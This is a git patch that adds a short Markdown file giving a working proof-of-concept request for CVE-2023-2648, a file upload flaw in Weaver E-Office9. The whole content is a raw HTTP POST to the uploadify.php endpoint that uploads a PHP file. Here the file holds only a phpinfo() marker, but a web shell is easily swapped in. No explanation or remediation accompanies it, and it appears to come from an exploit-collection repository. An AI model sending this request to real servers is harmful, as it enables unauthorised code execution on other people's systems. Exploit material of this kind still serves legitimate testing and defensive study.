From 9e5d77ab331d9d71c75655bf6154e2837dbfdd92 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 19 Aug 2023 20:21:42 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E6=9F=90=E5=BE=AEE-Office9=E6=96=87?=
 =?UTF-8?q?=E4=BB=B6=E4=B8=8A=E4=BC=A0=E6=BC=8F=E6=B4=9E=20CVE-2023-2648.m?=
 =?UTF-8?q?d?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 某微E-Office9文件上传漏洞 CVE-2023-2648.md | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)
 create mode 100644 某微E-Office9文件上传漏洞 CVE-2023-2648.md

diff --git a/某微E-Office9文件上传漏洞 CVE-2023-2648.md b/某微E-Office9文件上传漏洞 CVE-2023-2648.md
new file mode 100644
index 0000000..9616cd8
--- /dev/null
+++ b/某微E-Office9文件上传漏洞 CVE-2023-2648.md	
@@ -0,0 +1,19 @@
+## 某微E-Office9文件上传漏洞 CVE-2023-2648
+
+```
+POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
+Host: 192.168.233.10:8082
+User-Agent: test
+Connection: close
+Content-Length: 493
+Accept-Encoding: gzip
+Content-Type: multipart/form-data
+
+------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
+Content-Disposition: form-data; name="Filedata"; filename="666.php"
+Content-Type: application/octet-stream
+
+<?php phpinfo();?>
+
+------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
+```